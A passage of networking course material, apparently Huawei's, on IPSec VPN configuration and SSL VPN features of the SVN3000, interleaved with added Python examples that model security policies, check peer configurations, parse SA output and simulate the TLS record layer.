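        return (ipaddress.ip_address(pkt["src"]) in self.src and
                ipaddress.ip_address(pkt["dst"]) in self.dst and
                (self.proto is None or self.proto == pkt["proto"]))


class IPSecNode:
    def __init__(self):
        self.spd = []     # ordered; first matching policy wins
        self.sad = {}     # (spi, destination address, protocol) -> SA parameters

    def add_sa(self, spi, dst, protocol, **params):
        """SAs are unidirectional; the triplet is their unique identifier."""
        self.sad[(spi, dst, protocol)] = params

    def policy_for(self, pkt):
        return next((p for p in self.spd if p.matches(pkt)), None)

    def outbound(self, pkt):
        """Return the action and, for protect, the SA triplet to apply."""
        policy = self.policy_for(pkt)
        if policy is None or policy.action == DISCARD:
            return DISCARD, None              # no policy means drop, never bypass
        if policy.action == BYPASS:
            return BYPASS, None
        if policy.sa not in self.sad:
            return DISCARD, None              # a real stack would trigger IKE here
        return PROTECT, policy.sa

    def inbound(self, pkt):
        if pkt["proto"] in (ESP, AH):
            key = (pkt["spi"], pkt["dst"], pkt["proto"])
            if key not in self.sad:
                return DISCARD, None          # unknown SA: cannot verify anything
            policy = self.policy_for(pkt["inner"])
            # After decapsulation the inner packet must match a protect policy
            # bound to this very SA; otherwise a peer could smuggle traffic.
            if policy is None or policy.action != PROTECT or policy.sa != key:
                return DISCARD, None
            return PROTECT, key
        policy = self.policy_for(pkt)
        if policy is None or policy.action != BYPASS:
            return DISCARD, None              # clear text where protection is required
        return BYPASS, None


def build_usg_a():
    """Assumed policy of USG A: protect intranet-to-intranet, bypass the rest."""
    node = IPSecNode()
    node.add_sa(0x1001, "202.39.169.1", ESP, cipher="aes", auth="sha1")  # outbound
    node.add_sa(0x2002, "202.39.160.1", ESP, cipher="aes", auth="sha1")  # inbound
    node.spd = [
        SecurityPolicy("192.168.0.0/24", "192.168.1.0/24", PROTECT, sa=(0x1001, "202.39.169.1", ESP)),
        SecurityPolicy("192.168.1.0/24", "192.168.0.0/24", PROTECT, sa=(0x2002, "202.39.160.1", ESP)),
        SecurityPolicy("192.168.0.0/24", "0.0.0.0/0", BYPASS),
        SecurityPolicy("0.0.0.0/0", "192.168.0.0/24", BYPASS),
        SecurityPolicy("0.0.0.0/0", "0.0.0.0/0", DISCARD),
    ]
    return node


if __name__ == "__main__":
    usg_a = build_usg_a()
    print(usg_a.outbound({"src": "192.168.0.2", "dst": "192.168.1.2", "proto": 6}))
    print(usg_a.outbound({"src": "192.168.0.2", "dst": "8.8.8.8", "proto": 6}))
    print(usg_a.inbound({"src": "192.168.1.2", "dst": "192.168.0.2", "proto": 6}))
```

The last call shows the check that matters most in practice: a clear-text packet claiming to come from the peer intranet is discarded, because the policy says such traffic must arrive inside the SA.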
(Section 6: IPSec VPN Application Scenarios)
Networking Requirements

(Figure)
USG A: Eth 0/0/0 202.39.160.1/16 (public), Eth 0/0/1 192.168.0.1/24 (intranet); Host 1 192.168.0.2/24
USG B: Eth 0/0/0 202.39.169.1/16 (public), Eth 0/0/1 192.168.1.1/24 (intranet); Host 2 192.168.1.2/24

Networking requirements:
Host 1 (PC1) communicates securely with Host 2 (PC2); IKE is used between USG A (FWA) and USG B (FWB) to negotiate the establishment of the secure channel.
Set the IKE proposal with sequence number 10 on both USG A and USG B.
Use pre-shared key authentication and configure the authenticator (the pre-shared key) on both sides.
Both USG A and USG B have fixed public network addresses.
IPSec VPN Configuration Idea

(Flow chart)
Start
Basic configuration (such as setting the IP addresses of interfaces)
Configure IKE proposal
Configure IKE peer
Configure IPSec proposal
Configure IPSec policy
Reference the IPSec policy on interfaces
Enable filter rules of the corresponding zones
Configure the route to the peer intranet segment
End
IPSec Configuration Process: IPSec Proposal

Run the ipsec proposal proposal-name command to create a security proposal and enter the security proposal view.
Run the transform { ah | ah-esp | esp } command to select a security protocol. By default, esp is used.
Run the encapsulation-mode tunnel command to select the packet encapsulation mode.
Run the ah authentication-algorithm { md5 | sha1 } command to set the authentication algorithm used by AH. By default, MD5 is used.
Run the esp authentication-algorithm { md5 | sha1 } command to set the authentication algorithm used by ESP. By default, MD5 is used.
Run the esp encryption-algorithm { 3des | des | aes | scb2 } command to set the encryption algorithm used by ESP. By default, DES is used.

The defaults (MD5 and DES) are the weakest options in each list; set sha1 and aes explicitly. The proposals on the two peers must match, or the second-phase negotiation fails.
IPSec Configuration Process: IKE Proposal

Run the ike proposal proposal-number command to create an IKE proposal and enter the IKE proposal view.

Run the authentication-method pre-share command to set the authentication method.

Run the encryption-algorithm { des-cbc | 3des-cbc } command to select an encryption algorithm. By default, 56-bit DES in CBC mode is used.

If pre-shared key authentication is selected, set the pre-shared key for each peer. The pre-shared keys on the two ends that establish a secure connection must be the same.

Run the authentication-algorithm { md5 | sha } command to select an authentication algorithm. By default, SHA1 is used.

Run the dh { group1 | group2 | group5 } command to select the Diffie-Hellman group. By default, group1 (the 768-bit Diffie-Hellman group) is used.

Run the sa duration interval command to set the SA lifetime.
IPSec Configuration Process: IKE Peer

Run the ike peer peer-name command to create an IKE peer and enter the IKE peer view.

Run the exchange-mode { main | aggressive } command to configure the negotiation mode. In aggressive mode, the peer can be identified by its IP address or by its name; in main mode, the peer can be identified only by its IP address. By default, main mode is used for IKE negotiation.

Run the ike-proposal proposal-number command to reference the IKE proposal.

Run the local-id-type { ip | name } command to set the ID type of the IKE peer (optional).

Run the pre-shared-key key-string command to set the pre-shared key shared with the peer.

Run the local-address ip-address command to set the local IP address used for IKE negotiation.

Run the remote-address low-ip-address [ high-ip-address ] command to set the peer IP address.

Run the remote-name name command to set the peer name (used in aggressive mode when the name is used for authentication).
IPSec Configuration Process: IKE Peer (Continued)

Run the ipsec sa global-duration { time-based interval | traffic-based kilobytes } command to set the global SA lifetime (optional).

Run the ike local-name router-name command to set the local ID used for IKE negotiation (optional).

Run the ike sa keepalive-timer interval interval command to set the interval at which Keepalive packets are sent (optional).

Run the ike sa keepalive-timer timeout interval command to set the timeout for waiting for a Keepalive packet from the peer (optional).

Run the ike sa nat-keepalive-timer interval interval command to set the interval at which NAT keepalive packets are sent (optional).
IPSec Configuration Process: IPSec Security Policy and Application

Create an ACL to define the data flows to be protected.

Run the ipsec policy policy-name seq-number isakmp command to create a security policy.

Run the proposal proposal-name&<1-6> command to reference one to six security proposals in the security policy.

Run the sa duration { traffic-based kilobytes | time-based interval } command to set the SA lifetime (optional).

Run the ike-peer peer-name command to reference the IKE peer.

Run the security acl acl-number command to set the ACL referenced by the security policy.

Run the interface interface-type interface-number command to enter the interface view. Select the network egress interface.

Run the ipsec policy policy-name command to apply the security policy to the interface.
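The configuration steps above are only useful when both ends agree on every negotiated parameter. The following checker is an added example (it is not Huawei code and not part of the course): it models the parameters the slides tell you to configure for FWA and FWB, renders the command sequence in the order of the slides, and checks the two ends against each other before anything is pasted onto a firewall, including the mirrored-ACL requirement from the notices slide and a warning for the weak DES/MD5/group1 defaults. The public addresses are the ones shown in the verification output; the ACL number, proposal and peer names, key string and egress interface are assumptions made for the example.

```python
"""Two-ended IKE/IPsec configuration checker for the FWA/FWB scenario.

Added example, not course material.  Public addresses come from the slides;
ACL numbers, names, key string and egress interface are assumptions.
"""
from dataclasses import dataclass, field

# Defaults named on the slides that a practitioner should not leave in place.
WEAK = {"des": "56-bit DES", "des-cbc": "56-bit DES", "md5": "MD5",
        "group1": "768-bit DH group 1"}


@dataclass(frozen=True)
class AclRule:
    src: str   # "network wildcard", e.g. "192.168.0.0 0.0.0.255"
    dst: str


@dataclass
class Peer:
    name: str
    local_ip: str      # public address used for IKE (local-address)
    remote_ip: str     # peer's public address (remote-address)
    psk: str
    ike_seq: int = 10  # the scenario requires IKE proposal 10 on both ends
    ike_enc: str = "des-cbc"   # slide defaults follow
    ike_auth: str = "sha"
    ike_dh: str = "group1"
    transform: str = "esp"
    esp_enc: str = "des"
    esp_auth: str = "md5"
    acl: int = 3000
    rules: list = field(default_factory=list)
    egress: str = "GigabitEthernet 0/0/0"   # assumed public-side interface


def render_config(p: Peer) -> str:
    """Commands in the order of the configuration slides (proposal, IKE, policy, interface)."""
    lines = [f"ipsec proposal {p.name}_prop", f" transform {p.transform}",
             " encapsulation-mode tunnel",
             f" esp encryption-algorithm {p.esp_enc}",
             f" esp authentication-algorithm {p.esp_auth}",
             f"ike proposal {p.ike_seq}", " authentication-method pre-share",
             f" encryption-algorithm {p.ike_enc}",
             f" authentication-algorithm {p.ike_auth}", f" dh {p.ike_dh}",
             f"ike peer {p.name}_peer", " exchange-mode main",
             f" ike-proposal {p.ike_seq}", f" pre-shared-key {p.psk}",
             f" local-address {p.local_ip}", f" remote-address {p.remote_ip}",
             f"acl number {p.acl}"]
    lines += [f" rule permit ip source {r.src} destination {r.dst}" for r in p.rules]
    lines += [f"ipsec policy {p.name}_pol 10 isakmp", f" proposal {p.name}_prop",
              f" ike-peer {p.name}_peer", f" security acl {p.acl}",
              f"interface {p.egress}", f" ipsec policy {p.name}_pol"]
    return "\n".join(lines)


def check_pair(a: Peer, b: Peer) -> list:
    """Return (severity, message) findings; no 'error' entries means the ends can negotiate."""
    out = []
    for attr in ("ike_seq", "ike_enc", "ike_auth", "ike_dh",
                 "transform", "esp_enc", "esp_auth"):
        if getattr(a, attr) != getattr(b, attr):
            out.append(("error", f"{attr} differs: {a.name}={getattr(a, attr)}, "
                                 f"{b.name}={getattr(b, attr)}"))
    if a.psk != b.psk:
        out.append(("error", "pre-shared keys differ"))
    if a.remote_ip != b.local_ip or b.remote_ip != a.local_ip:
        out.append(("error", "remote-address of one end is not the local-address of the other"))
    # Notices slide: the two ACLs should be mirror images (source/destination swapped).
    if set(a.rules) != {AclRule(r.dst, r.src) for r in b.rules}:
        out.append(("error", f"ACL {a.acl} on {a.name} is not the mirror of ACL {b.acl} on {b.name}"))
    for attr in ("ike_enc", "ike_auth", "ike_dh", "esp_enc", "esp_auth"):
        v = getattr(a, attr)
        if v in WEAK:
            out.append(("warning", f"{attr}={v} ({WEAK[v]}) is the slide default but weak; "
                                   "prefer aes, sha and group5 where the peer supports them"))
    return out


def course_scenario(psk: str = "Huawei@123") -> tuple:
    """FWA/FWB from the slides; the PSK and ACL rules are assumptions."""
    fwa = Peer("FWA", "202.39.160.1", "202.39.169.1", psk,
               rules=[AclRule("192.168.0.0 0.0.0.255", "192.168.1.0 0.0.0.255")])
    fwb = Peer("FWB", "202.39.169.1", "202.39.160.1", psk,
               rules=[AclRule("192.168.1.0 0.0.0.255", "192.168.0.0 0.0.0.255")])
    return fwa, fwb


if __name__ == "__main__":
    fwa, fwb = course_scenario()
    print(render_config(fwa))
    for severity, msg in check_pair(fwa, fwb):
        print(f"[{severity}] {msg}")
```

Run as a script it prints FWA's command sequence followed by the findings for the pair; with the slide defaults the pair negotiates (no errors) but four weak-algorithm warnings are reported, which is exactly what the verification slides later show as E:DES;A:HMAC-MD5-96.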

IPSec VPN Configuration Wizard (Web)

[Screenshot: the Web-based IPSec VPN configuration wizard]

IPSec Result Verification and Maintenance Commands

PC1 and PC2 can access each other.

Two IPSec SAs, one per direction, are shown on the firewall:

<FWA> display ipsec sa brief
current ipsec sa number: 2
Src Address      Dst Address      SPI         VPN  Protocol  Algorithm
------------------------------------------------------------------------------
202.39.160.1     202.39.169.1     957073432   0    ESP       E:DES;A:HMAC-MD5-96;
202.39.169.1     202.39.160.1     2838744079  0    ESP       E:DES;A:HMAC-MD5-96;

The Algorithm column shows the negotiated ESP encryption (E) and authentication (A) algorithms; here they are the defaults, DES and HMAC-MD5-96.

IPSec Result Verification and Maintenance Commands (Continued)

IKE peer and IKE SA information can be shown:

<USG B> display ike sa
connection-id  peer            flag    phase  doi
------------------------------------------------------------------------
2              202.39.160.1    RD|ST   1      IPSEC
4              202.39.160.1    RD|ST   2      IPSEC

One entry in phase 1 (the IKE SA) and one in phase 2 (the IPSec SA) with the peer 202.39.160.1 show that both negotiation phases completed.
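The two displays above are what an operator reads by eye; the following added example (not Huawei code, not part of the course) does the same check programmatically. It parses the text of display ipsec sa brief and display ike sa as shown on the slides, confirms that the tunnel is complete (a ready IKE SA in phase 1 and in phase 2 with the peer, and an IPSec SA in each direction), checks that SPIs are unique, and flags the weak default algorithms that the sample output shows. The embedded output is a constructed copy of the slides' output.

```python
"""Checker for 'display ipsec sa brief' and 'display ike sa' output.

Added example, not course material.  SA_BRIEF and IKE_SA are constructed
copies of the output shown on the verification slides.
"""
import re

SA_BRIEF = """\
current ipsec sa number: 2
Src Address      Dst Address      SPI         VPN  Protocol  Algorithm
------------------------------------------------------------------------------
202.39.160.1     202.39.169.1     957073432   0    ESP       E:DES;A:HMAC-MD5-96;
202.39.169.1     202.39.160.1     2838744079  0    ESP       E:DES;A:HMAC-MD5-96;
"""

IKE_SA = """\
connection-id  peer            flag    phase  doi
------------------------------------------------------------------------
2              202.39.160.1    RD|ST   1      IPSEC
4              202.39.160.1    RD|ST   2      IPSEC
"""

WEAK_ALG = {"DES", "MD5"}   # the slide defaults: 56-bit DES and the deprecated MD5

IPSEC_ROW = re.compile(r"^(\d+\.\d+\.\d+\.\d+)\s+(\d+\.\d+\.\d+\.\d+)\s+(\d+)\s+(\d+)\s+(AH|ESP)\s+(\S+)")
IKE_ROW = re.compile(r"^(\d+)\s+(\d+\.\d+\.\d+\.\d+)\s+(\S+)\s+(\d)\s+(\S+)")


def parse_ipsec_sa(text: str) -> list:
    """Rows of 'display ipsec sa brief' as dicts; the Algorithm field E:..;A:..; is split."""
    sas = []
    for line in text.splitlines():
        m = IPSEC_ROW.match(line.strip())
        if m:
            src, dst, spi, vpn, proto, alg = m.groups()
            algs = dict(part.split(":", 1) for part in alg.strip(";").split(";"))
            sas.append({"src": src, "dst": dst, "spi": int(spi), "vpn": int(vpn),
                        "proto": proto, "enc": algs.get("E"), "auth": algs.get("A")})
    return sas


def parse_ike_sa(text: str) -> list:
    """Rows of 'display ike sa'; flags such as RD|ST become a set (RD = ready)."""
    rows = []
    for line in text.splitlines():
        m = IKE_ROW.match(line.strip())
        if m:
            cid, peer, flags, phase, doi = m.groups()
            rows.append({"id": int(cid), "peer": peer, "flags": set(flags.split("|")),
                         "phase": int(phase), "doi": doi})
    return rows


def verify_tunnel(local: str, remote: str, ipsec_text: str, ike_text: str) -> tuple:
    """Return (ok, findings).  ok is False only for structural problems; weak
    algorithms are reported as findings that start with 'weak'."""
    findings = []
    sas = parse_ipsec_sa(ipsec_text)
    directions = {(s["src"], s["dst"]) for s in sas}
    for d in ((local, remote), (remote, local)):
        if d not in directions:
            findings.append(f"missing IPsec SA {d[0]} -> {d[1]}")
    spis = [s["spi"] for s in sas]
    if len(spis) != len(set(spis)):
        findings.append("duplicate SPI")           # SPI, destination and protocol identify an SA
    ready_phases = {r["phase"] for r in parse_ike_sa(ike_text)
                    if r["peer"] == remote and "RD" in r["flags"]}
    for phase in (1, 2):
        if phase not in ready_phases:
            findings.append(f"no ready (RD) IKE SA in phase {phase} with {remote}")
    for s in sas:
        for alg in (s["enc"], s["auth"]):
            if alg and any(w in alg.upper() for w in WEAK_ALG):
                findings.append(f"weak algorithm {alg} on SA {s['src']} -> {s['dst']}")
    ok = not [f for f in findings if not f.startswith("weak")]
    return ok, findings


if __name__ == "__main__":
    ok, findings = verify_tunnel("202.39.169.1", "202.39.160.1", SA_BRIEF, IKE_SA)
    print("tunnel complete" if ok else "tunnel incomplete")
    for f in findings:
        print(" -", f)
```

Run from the USG B side (local 202.39.169.1, remote 202.39.160.1) the slides' output passes the structural checks but produces four weak-algorithm findings, one per algorithm per SA.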

Notices About IPSec VPN Configuration

On the firewall, there must be a route to the peer intranet segment.

Disable the fast forwarding function on the USG2100 interface that is connected to the intranet.

Define the Source field of the firewall ACL that actively triggers the IPSec VPN. The ACLs on the two ends should be mirror images of each other (source and destination exchanged).

Set the default packet filter rule between the Local and Untrust zones so that the devices on the two ends of the IPSec tunnel can reach each other and negotiate the SA.

Summary

Basic principles of IPSec

AH and ESP technologies

Service flow of the IKE protocol

Application scenarios and configurations of IPSec VPN

Questions

Which security services does IPSec VPN provide? What is the meaning and the implementation of each security service?

What are the two major security protocols of IPSec? What is the difference between them?

What are the two encapsulation modes of IPSec? What is the difference between their application scenarios?

Which four security mechanisms can be provided by IKE? What is the function of each security mechanism?

What is the function of SAs in IPSec? Which triplet uniquely identifies an SA?

What are the two negotiation modes of IKE phase 1? What are their scenarios?

What is the difference in configuration options between the two IKE phase 1 negotiation modes?

Which technology is used by IPSec to trigger the establishment of an IPSec tunnel?

In tunnel mode, how is a private network route set?

In IPSec application scenarios, how should the interzone packet filter be set to meet the least privilege requirement? Analyze from the perspective of the service flow direction.

Answer

Thank you

www.huawei.com

Chapter 10 SSL VPN

Objectives

Upon completion of this course, you will be familiar with:

SSL VPN technology

Basic functions and features of the SVN3000

Methods for configuring the SSL VPN

Contents

1. SSL VPN Overview

2. SSL VPN Technology

3. SSL VPN Security Policy

4. SSL VPN Application Scenario

SSL Overview

[Figure: position of SSL in the TCP/IP protocol stack. Not secure: HTTP over TCP over IP. Secure: HTTP over SSL over TCP over IP.]

SSL is inserted between the application protocol (HTTP) and TCP, so it secures an application carried over TCP without changes to TCP or IP.

Security Comparison Between SSL and IPSec

[Figure: protocol stacks. SSL VPN: APP+Data / HTTP / SSL / TCP / IP. IPSec VPN: APP+Data / TCP / IP / IPSec / IP (the original IP packet is encapsulated by IPSec inside an outer IP header).]

SSL protects a single application session above TCP; IPSec protects all IP traffic between the two tunnel endpoints below the transport layer.

SSL VPN Security Technology

SSL ensures data security from the following aspects:

Identity authentication: before an SSL connection is set up, the client and the server perform authentication using digital certificates. The authentication can be unilateral (only the server is authenticated to the client) or bidirectional (client and server authenticate each other).

Confidentiality: the negotiated encryption algorithm is used to encrypt the transmitted data.

Integrity: a message digest (MAC) algorithm is used to check whether the data was modified during transmission.


SSL Protocol Structure

[Figure: application layer protocol on top; the SSL handshake protocol, SSL change cipher spec protocol and SSL alert protocol side by side above the SSL record protocol; TCP and IP below.]

SSL Bottom Layer: SSL Record Protocol

[Figure: SSL Record operation process and SSL Record packet structure]

The record protocol processes application data in the following steps:

1. Segment the application data into fragments.

2. Compress each fragment (optional).

3. Add a MAC (message authentication code) computed over the fragment.

4. Encrypt the fragment together with its MAC.

5. Add the SSL Record packet header.
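The five steps above are easier to see in code. The following is an added example (not SVN3000 code, not part of the course) implementing one direction of the record layer: fragmentation into at most 2^14-byte pieces, identity compression, a TLS 1.0-style HMAC over the sequence number, type, version, length and fragment, encryption, and the 5-byte record header, plus the receiving side that undoes it and rejects a tampered or replayed record. Because the Python standard library has no AES, the bulk cipher is a stand-in keystream built from HMAC-SHA256; keys and data are constructed for the example.

```python
"""SSL/TLS record layer pipeline: segment -> (compress) -> MAC -> encrypt -> header.

Added example, not course material.  The keystream cipher below is a stand-in
for the negotiated bulk cipher so that the block runs offline.
"""
import hashlib
import hmac
import struct

MAX_FRAGMENT = 2 ** 14          # the record layer fragments data into <= 16384-byte pieces
VERSION = b"\x03\x01"           # TLS 1.0 version bytes on the wire
APPLICATION_DATA = 23           # content type of application data records
MAC_LEN = 20                    # HMAC-SHA1 tag length


def keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    """Toy counter-mode keystream (stand-in for AES/3DES); never reuse (key, nonce)."""
    out = b""
    for ctr in range((n + 31) // 32):
        out += hmac.new(key, nonce + struct.pack(">I", ctr), hashlib.sha256).digest()
    return out[:n]


class RecordLayer:
    """One direction of a connection; build one for writing and one for reading."""

    def __init__(self, mac_key: bytes, enc_key: bytes):
        self.mac_key, self.enc_key = mac_key, enc_key
        self.write_seq = 0      # implicit 64-bit sequence numbers, never on the wire
        self.read_seq = 0

    def _mac(self, seq: int, ctype: int, fragment: bytes) -> bytes:
        header = struct.pack(">QB2sH", seq, ctype, VERSION, len(fragment))
        return hmac.new(self.mac_key, header + fragment, hashlib.sha1).digest()

    def protect(self, data: bytes, ctype: int = APPLICATION_DATA) -> list:
        """Application data -> list of wire records (steps 1-5 of the slide)."""
        records = []
        for off in range(0, len(data), MAX_FRAGMENT):
            fragment = data[off:off + MAX_FRAGMENT]            # 1. segment; 2. compression = identity
            body = fragment + self._mac(self.write_seq, ctype, fragment)   # 3. add MAC
            nonce = struct.pack(">Q", self.write_seq)
            ks = keystream(self.enc_key, nonce, len(body))
            cipher = bytes(a ^ b for a, b in zip(body, ks))     # 4. encrypt fragment + MAC
            records.append(struct.pack(">B2sH", ctype, VERSION, len(cipher)) + cipher)  # 5. header
            self.write_seq += 1
        return records

    def unprotect(self, record: bytes) -> bytes:
        """Wire record -> fragment; raises ValueError where the alert protocol would send bad_record_mac."""
        ctype, version, length = struct.unpack(">B2sH", record[:5])
        if version != VERSION or len(record) != 5 + length or length < MAC_LEN:
            raise ValueError("bad record header")
        nonce = struct.pack(">Q", self.read_seq)
        body = bytes(a ^ b for a, b in zip(record[5:], keystream(self.enc_key, nonce, length)))
        fragment, tag = body[:-MAC_LEN], body[-MAC_LEN:]
        if not hmac.compare_digest(tag, self._mac(self.read_seq, ctype, fragment)):
            raise ValueError("bad_record_mac")     # tampering, or a replayed/out-of-order record
        self.read_seq += 1
        return fragment
```

The sequence number is part of the MAC input but never sent, which is what makes a replayed record fail verification on the receiver; the MAC-then-encrypt order shown here is the historical SSL/TLS construction and is the reason padding-oracle attacks were possible against CBC cipher suites.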

SSL Upper Layer Protocols

The SSL protocol is implemented using three elements:

Handshake protocol

Record protocol

Alert protocol

SSL Principle: Handshake Protocol

Before SSL communication starts, the handshake protocol is used to negotiate the security parameters (such as the encryption algorithm, the shared key, and the material used to generate the key) and to authenticate the peers.

SSL Principle: Session Recovery (Resumption)

If the client and server have communicated with each other before, they can skip the full handshake and directly exchange data. SSL uses session resumption to avoid the large overhead of a full SSL handshake.

SSL VPN Introduction

[Figure: the SVN3000 security access gateway and its feature set: cutting-edge virtual gateway, Web proxy, file sharing, port proxy (port forwarding), network extension, comprehensive log function, and user security control.]

Virtual Gateway

[Figure: virtual gateways on the SVN]

The SVN provides the SSL VPN services through virtual gateways.

An SVN can be configured with a maximum of 128 virtual gateways.

Web Proxy

The Web proxy enables users to safely access intranet Web resources.

The Web proxy supports clientless Web access.

The Web proxy supports two implementation modes: Web-link and Web rewriting.

[Figure: Remote user -> SVN3000 -> Web server]

File Sharing

The file sharing function supports secure access to the internal file system.

The SSL VPN uses protocol conversion to provide the file sharing function. Users can safely access the intranet file system directly from their browsers. The SSL VPN converts the users' file sharing requests into the corresponding protocol format to interact with the servers.

Protocols: SMB (Windows file servers) and NFS (Linux/UNIX file servers).

Supported operations: new folder, rename the file or folder, delete the file or folder, browse, download the file, upload the file.

Implementation of File Sharing

Taking access to an internal Windows file server as an example, file sharing is implemented as follows:

1. The client sends an HTTPS request for the file server on the intranet. The HTTPS request is received by the SVN.

2. The SVN converts the HTTPS request into an SMB packet.

3. The SVN sends the SMB packet to the file server.

4. The file server processes the request and sends an SMB response to the SVN.

5. The SVN converts the SMB response into an HTTPS packet.

6. The SVN sends the HTTPS packet to the client.

[Figure: Client <-HTTPS-> SVN <-SMB/NFS-> File server]

Characteristics of File Sharing

[Figure: SVN3000 file sharing: file-level access permission control, SSL encryption for file transmission, authentication on file access, extra access control factors on the SVN.]

Access to the file system is as secure and convenient as on the local computer.

The hot key Ctrl+C cannot be used.

Port Forwarding

The port forwarding function provides access to various TCP application services on the intranet.

Supports TCP applications over static ports:

Single-port single-server (Telnet, SSH, MS RDP, VNC)

Single-port multi-server (Lotus Notes)

Multi-port multi-server (Outlook)

Supports TCP applications over dynamic ports (FTP, Oracle)

Provides port-level access control

Principles of Port Forwarding

[Figure: CLIENT (application request -> application agent) -> SSL over the Internet -> SVN3000 -> SERVER (TCP 23, TCP 25, TCP 110, TCP 21). Providing secure access to TCP applications on the intranet.]

A local application agent on the client accepts the application's TCP connection and carries it to the SVN3000 over SSL; the SVN3000 then connects to the real server port on the intranet.

Port Forwarding Features

[Figure: SVN3000 port forwarding]

Support of various intranet TCP applications: remote desktop, Outlook, Notes, FTP, and SSH.

Encryption and authentication on all data flows.

Global authentication and authorization of users.

Access control over TCP applications.

Standard browser without requiring client installation.

These features ensure the security and reliability of TCP applications and provide easy operation and management.

Network Extension

The network extension function supports access to all the complex applications on the entire network. By establishing a secure SSL tunnel, users can access all the applications on the IP-based intranet.

Implementation mode:

ActiveX control

Private client software: one-off installation requiring no manual configuration

Access mode (configured by the administrator based on the application scenario):

Full Tunnel: the user can access only the enterprise intranet.

Split Tunnel: the user can access the intranet and the local subnet.

Manual Tunnel: the user can access the resources in the specified network segments of the enterprise network. The network access does not affect other operations: users can still access the Internet and the local subnet.

Implementation of Network Extension

1. On the client, download the control and install the virtual network adapter. The virtual network adapter obtains an IP address that can be routed on the intranet.

2. The client originates a request for an application on the IP-based intranet. The client (through the virtual network adapter) intercepts the request, encapsulates and encrypts it, and sends the packet to the SVN.

3. The SVN decrypts the packet and sends it to the intranet server.

4. The intranet server sends a response to the SVN. The SVN encrypts and encapsulates the packet and sends it to the client.

Full Tunnel

[Figure: client LAN -> Internet -> SSL VPN tunnel -> headquarters intranet resources]

All the traffic is transmitted to the gateway.

Split Tunnel

[Figure: client LAN -> Internet -> SSL VPN tunnel -> headquarters intranet resources]

Besides the intranet, the client can access the local subnet to which it belongs.

Manual Tunnel

[Figure: client LAN -> Internet -> SSL VPN tunnel -> headquarters intranet resources]

The client can access the resources in the specified network segments. The client can still access the local subnet and the Internet at the same time.
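The three modes differ only in the client's routing decision, which the following added example (not SVN3000 code, not part of the course) makes explicit: for each destination address it decides whether a packet enters the SSL VPN tunnel, stays on the local subnet, goes directly to the Internet, or is dropped, following the slides' descriptions of Full, Split and Manual tunnel. It also reports the common failure mode of a tunnelled prefix that overlaps the client's own LAN. All prefixes below are assumptions made for the example.

```python
"""Client-side routing decisions for the three network extension modes.

Added example, not course material.  Prefixes are assumptions for the example.
"""
import ipaddress

TUNNEL, LOCAL, DIRECT, BLOCKED = "tunnel", "local-subnet", "direct", "blocked"


class ClientRouting:
    """Routing policy pushed to the client for one virtual gateway."""

    def __init__(self, mode: str, local_subnet: str, intranet, manual_segments=()):
        if mode not in ("full", "split", "manual"):
            raise ValueError(f"unknown tunnel mode {mode!r}")
        self.mode = mode
        self.local = ipaddress.ip_network(local_subnet)            # the client's own LAN
        self.intranet = [ipaddress.ip_network(n) for n in intranet]   # enterprise prefixes
        self.manual = [ipaddress.ip_network(n) for n in manual_segments]  # administrator's list

    def route(self, dst: str) -> str:
        """Where a packet for dst goes under the configured mode."""
        ip = ipaddress.ip_address(dst)
        if self.mode == "full":
            return TUNNEL                      # everything goes to the gateway, local subnet included
        if self.mode == "split":
            if any(ip in n for n in self.intranet):
                return TUNNEL                  # intranet is matched first, so it wins over an overlapping LAN
            return LOCAL if ip in self.local else BLOCKED   # no Internet access in split mode
        if any(ip in n for n in self.manual):
            return TUNNEL                      # only the specified segments are tunnelled
        return LOCAL if ip in self.local else DIRECT        # Internet stays reachable in manual mode

    def conflicts(self) -> list:
        """Tunnelled prefixes that overlap the client's LAN; hosts there become unreachable locally."""
        tunnelled = self.manual if self.mode == "manual" else self.intranet
        return [str(n) for n in tunnelled if n.overlaps(self.local)]


if __name__ == "__main__":
    for mode in ("full", "split", "manual"):
        policy = ClientRouting(mode, "192.168.1.0/24", ["10.0.0.0/8"], ["10.10.0.0/16"])
        for dst in ("10.10.1.1", "10.20.1.1", "192.168.1.5", "8.8.8.8"):
            print(f"{mode:6} {dst:12} -> {policy.route(dst)}")
```

The conflicts check is the one to run before rolling out a split or manual tunnel: a remote user whose home LAN is 192.168.1.0/24 will silently lose local access when the enterprise intranet prefix covers the same range.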

SSL VPN Advantages

Convenient deployment without clients

Security protection for application-layer access

Improvement of enterprise efficiency

Disadvantages of Traditional VPNs

L2TP and dial-up: insecure; no user authentication; extra expenses for dial-up; restriction of dial-up access ports on the server; no application-based user authentication, permission, or auditing.

IPSec: high client management costs; no application permission; NAT problems; security risks; no auditing; no application-based access control policy; IP address leakage of the intranet.

MPLS: insecure; no encryption; no access control; lack of data authentication; high cost; interconnection problems between carriers; applicable only to the interconnection between large-scale intranets.

SSL VPN Example: Common Application

[Figure: Partner, Mobile office, Branch, Remote maintenance and Client connect over the Internet to the Intranet, which hosts ERP, Linux/NFS, SMB, Email and Web server. Encrypted external connection over the Internet; standard internal connection inside the intranet.]

SSL VPN Example: Operation Application Example

[Figure: IDC hosting. Enterprise users A, B and C connect over the Internet through SSL VPN to the IDC firewall (FW) and switch (SW), monitored by an IDS. The SSL VPN gateway is virtualized (virtual firewall, virtual SSL VPN gateway) so that each enterprise reaches only its own trusted server cluster (server clusters of enterprises A, B and C).]


Authentication and Authorization

Authentication methods:

VPNDB authentication and authorization

RADIUS authentication and authorization

LDAP authentication and authorization

X.509 digital certificate authentication

USB KEY + X.509 digital certificate authentication

[Figure: remote access over the Internet to the SVN, which consults the authentication server before granting access to the file server, Web server and OA server.]

Terminal Security Policy

Terminal security threats:

Ineffective self-protection of the terminal

Terminals accessing unauthorized network resources

Network resource abuse by terminals

Damage caused by malicious terminals

Terminal security policy checks:

Antivirus software check

Process check

Port check

Firewall check

Operating system check

File check

Registry check

SVN3000 Functions

[Figure: SSL VPN access types mapped to SVN3000 functions. Web access -> Web proxy -> Web servers. File access -> File sharing. TCP applications such as Notes and Telnet -> Port forwarding -> E-mail. Other complex services -> Network extension -> ERP. IPSec VPN is supported alongside the SSL VPN functions.]

Comprehensive Log Functions

System log: system reboot record, network interface status record, temperature alarm record, import and export record, system administrator management record, and virtual gateway management record.

User log: user successful login record, user failed login record, offline after login record, password modification record, and service log.

Virtual gateway administrator log: administrator online and offline record, administrator login failure record, virtual gateway configuration saving record, user management record, and security management record.

Log export: real-time log export, text-format log export, and CLI log export.

Log query: hierarchical Web page log query and CLI log query.


SVN3000 Application Scenario: Typical Network Position

